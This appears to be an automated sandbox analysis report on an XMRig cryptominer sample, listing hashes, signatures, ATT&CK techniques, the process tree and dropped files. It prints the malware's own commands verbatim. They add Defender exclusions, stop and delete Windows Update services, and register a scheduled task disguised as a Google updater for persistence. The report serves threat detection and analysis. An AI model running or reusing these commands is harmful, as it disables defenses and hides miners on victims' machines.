xmrig | c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

General

Target

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe
Size

4.0MB
MD5

9e2dccb45bffdc436741e88b0125cfba
SHA1

07ea0a692175a9a3c946263cb77fb8a328c8ebc1
SHA256

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3
SHA512

457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a
SSDEEP

49152:gT7yVPROZiO+S/+wpOBvfP35y8XVA1drVgfQi4V9XBVzc/4zQFFaNzzcICyxhouf:gT72P2irffhy8XV+ZiWzwiNzxOAukKr

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmp	xmrig
behavioral1/memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

3616 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3616	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmp	upx
behavioral1/memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmp	upx

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 3616 set thread context of 4924	3616	updater.exe	conhost.exe
PID 3616 set thread context of 1816	3616	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4220 sc.exe
3800 sc.exe
616 sc.exe
4348 sc.exe
2420 sc.exe
2380 sc.exe
3640 sc.exe
392 sc.exe
2832 sc.exe
2236 sc.exe

pid	process
4220	sc.exe
3800	sc.exe
616	sc.exe
4348	sc.exe
2420	sc.exe
2380	sc.exe
3640	sc.exe
392	sc.exe
2832	sc.exe
2236	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
4092	powershell.exe
4092	powershell.exe
3872	powershell.exe
3872	powershell.exe
4388	powershell.exe
4388	powershell.exe
2076	powershell.exe
2076	powershell.exe
1844	powershell.exe
1844	powershell.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe
1816	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
644

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe
Token: 36	3872	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	powershell.exe
Token: SeSecurityPrivilege	3872	powershell.exe
Token: SeTakeOwnershipPrivilege	3872	powershell.exe
Token: SeLoadDriverPrivilege	3872	powershell.exe
Token: SeSystemProfilePrivilege	3872	powershell.exe
Token: SeSystemtimePrivilege	3872	powershell.exe
Token: SeProfSingleProcessPrivilege	3872	powershell.exe
Token: SeIncBasePriorityPrivilege	3872	powershell.exe
Token: SeCreatePagefilePrivilege	3872	powershell.exe
Token: SeBackupPrivilege	3872	powershell.exe
Token: SeRestorePrivilege	3872	powershell.exe
Token: SeShutdownPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3872	powershell.exe
Token: SeRemoteShutdownPrivilege	3872	powershell.exe
Token: SeUndockPrivilege	3872	powershell.exe
Token: SeManageVolumePrivilege	3872	powershell.exe
Token: 33	3872	powershell.exe
Token: 34	3872	powershell.exe
Token: 35	3872	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exe

description	pid	process	target process
PID 4104 wrote to memory of 4092	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4104 wrote to memory of 4092	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4104 wrote to memory of 4464	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	cmd.exe
PID 4104 wrote to memory of 4464	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	cmd.exe
PID 4104 wrote to memory of 3872	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4104 wrote to memory of 3872	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4464 wrote to memory of 3640	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 3640	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 616	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 616	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 4348	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 4348	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 392	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 392	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 2832	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 2832	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 2960	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 2960	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 5112	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 5112	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 4488	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 4488	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 2584	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 2584	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 1216	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 1216	4464	cmd.exe	reg.exe
PID 4104 wrote to memory of 4388	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4104 wrote to memory of 4388	4104	c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe	powershell.exe
PID 4388 wrote to memory of 4340	4388	powershell.exe	schtasks.exe
PID 4388 wrote to memory of 4340	4388	powershell.exe	schtasks.exe
PID 3616 wrote to memory of 2076	3616	updater.exe	powershell.exe
PID 3616 wrote to memory of 2076	3616	updater.exe	powershell.exe
PID 3616 wrote to memory of 2720	3616	updater.exe	cmd.exe
PID 3616 wrote to memory of 2720	3616	updater.exe	cmd.exe
PID 3616 wrote to memory of 1844	3616	updater.exe	powershell.exe
PID 3616 wrote to memory of 1844	3616	updater.exe	powershell.exe
PID 2720 wrote to memory of 2420	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 2420	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 2236	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 2236	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 2380	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 2380	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 4220	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 4220	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 3800	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 3800	2720	cmd.exe	sc.exe
PID 2720 wrote to memory of 4968	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 4968	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 4868	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 4868	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 3092	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 3092	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 3288	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 3288	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 4536	2720	cmd.exe	reg.exe
PID 2720 wrote to memory of 4536	2720	cmd.exe	reg.exe
PID 3616 wrote to memory of 4924	3616	updater.exe	conhost.exe
PID 3616 wrote to memory of 4924	3616	updater.exe	conhost.exe
PID 3616 wrote to memory of 4924	3616	updater.exe	conhost.exe
PID 3616 wrote to memory of 4952	3616	updater.exe	cmd.exe
PID 3616 wrote to memory of 4952	3616	updater.exe	cmd.exe
PID 4924 wrote to memory of 4424	4924	conhost.exe	cmd.exe
PID 4924 wrote to memory of 4424	4924	conhost.exe	cmd.exe
PID 4952 wrote to memory of 4532	4952	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe
"C:\Users\Admin\AppData\Local\Temp\c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3640

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:616

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4348

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:392

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2832

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2960

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:5112

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:4488

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2584

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:4340

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2076

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2420

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2236

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2380

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4220

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3800

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4968

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4868

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3092

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3288

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1844

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jmcfgycslfymn
2⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:4424

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:4952

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name
3⤵
PID:4532

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8808750cf94934c2a6471ccc5f0b932a

SHA1
dd1f5c5a7b725ecb0e4e96e0cebb62721e774dab

SHA256
ffe821af02d97eeb40bca0f73c858296c854263a5477941c3bc4eb649289d69c

SHA512
30b7e3f958621a284e95f2503daa1f5a0a10e01f18ed4e2ce9ebbba356a9d2a5bc4f15d3284863d405c24b9aa9181ec8cdf9def74a223a741aeb51d8190caa29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
ebf3b98c64927b3ce0ea322a3aa2b6db

SHA1
824c97b06cfa7b031c714a5564d76d10a5776cc7

SHA256
4b0a2a3fcf13e3553cf37c04525be0487fbe2f4f257316bbc41ef29285cdb9d2

SHA512
6e6e95607ce31abd66798a15639231ea23ddca6617967d7da1726bd3d78807d323713a2b55a24f07d82032a6d99587df8c63e6671bd6e2167a5bf9bad09290a1

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
142B

MD5
543c22e022ad2fe07e2fff6782b5842f

SHA1
b0ce4f26371897a0f1a3460c14520adf3d665a69

SHA256
62c97f684183ebec6c67e3cd5cb96e23435d07e0ef9687196b58a2da6d5de8a3

SHA512
f33db332015bb84e8c31dd78af7511b761e8bf7946cd046b7190df1246f7ae646e5edaa1f47dae3f3137a80607697ec08b8d198438886e8a3c16f7e9dee83640

Download Submit
memory/392-142-0x0000000000000000-mapping.dmp

Download
memory/616-140-0x0000000000000000-mapping.dmp

Download
memory/1216-148-0x0000000000000000-mapping.dmp

Download
memory/1816-191-0x000001A4329C0000-0x000001A4329E0000-memory.dmp

Filesize
128KB

Download
memory/1816-186-0x000001A432940000-0x000001A432960000-memory.dmp

Filesize
128KB

Download
memory/1816-185-0x00007FF755B30000-0x00007FF756324000-memory.dmp

Filesize
8.0MB

Download
memory/1816-184-0x000001A430F60000-0x000001A430F80000-memory.dmp

Filesize
128KB

Download
memory/1816-193-0x000001A4329C0000-0x000001A4329E0000-memory.dmp

Filesize
128KB

Download
memory/1816-192-0x000001A4329A0000-0x000001A4329C0000-memory.dmp

Filesize
128KB

Download
memory/1816-183-0x00007FF7563225D0-mapping.dmp

Download
memory/1816-188-0x000001A4329A0000-0x000001A4329C0000-memory.dmp

Filesize
128KB

Download
memory/1816-189-0x000001A4329A0000-0x000001A4329C0000-memory.dmp

Filesize
128KB

Download
memory/1816-190-0x000001A4329A0000-0x000001A4329C0000-memory.dmp

Filesize
128KB

Download
memory/1816-187-0x00007FF755B30000-0x00007FF756324000-memory.dmp

Filesize
8.0MB

Download
memory/1844-176-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/1844-170-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/1844-162-0x0000000000000000-mapping.dmp

Download
memory/2076-157-0x0000000000000000-mapping.dmp

Download
memory/2076-159-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/2076-160-0x00007FF82F9F0000-0x00007FF8304B1000-memory.dmp

Filesize
10.8MB

Download
memory/2236-165-0x0000000000000000-mapping.dmp

Download
memory/2380-167-0x0000000000000000-mapping.dmp

Download
memory/2420-164-0x0000000000000000-mapping.dmp

Download
memory/2584-147-0x0000000000000000-mapping.dmp

Download
memory/2720-161-0x0000000000000000-mapping.dmp

Download
memory/2832-143-0x0000000000000000-mapping.dmp

Download
memory/2960-144-0x0000000000000000-mapping.dmp

Download
memory/3092-173-0x0000000000000000-mapping.dmp

Download
memory/3288-174-0x0000000000000000-mapping.dmp

Download
memory/3640-138-0x0000000000000000-mapping.dmp

Download
memory/3800-169-0x0000000000000000-mapping.dmp

Download
memory/3872-135-0x0000000000000000-mapping.dmp

Download
memory/3872-149-0x00007FF82F640000-0x00007FF830101000-memory.dmp

Filesize
10.8MB

Download
memory/3872-150-0x00007FF82F640000-0x00007FF830101000-memory.dmp

Filesize
10.8MB

Download
memory/4092-163-0x00007FF82F640000-0x00007FF830101000-memory.dmp

Filesize
10.8MB

Download
memory/4092-132-0x0000000000000000-mapping.dmp

Download
memory/4092-136-0x00007FF82F640000-0x00007FF830101000-memory.dmp

Filesize
10.8MB

Download
memory/4092-133-0x00000217AC160000-0x00000217AC182000-memory.dmp

Filesize
136KB

Download
memory/4220-168-0x0000000000000000-mapping.dmp

Download
memory/4340-153-0x0000000000000000-mapping.dmp

Download
memory/4348-141-0x0000000000000000-mapping.dmp

Download
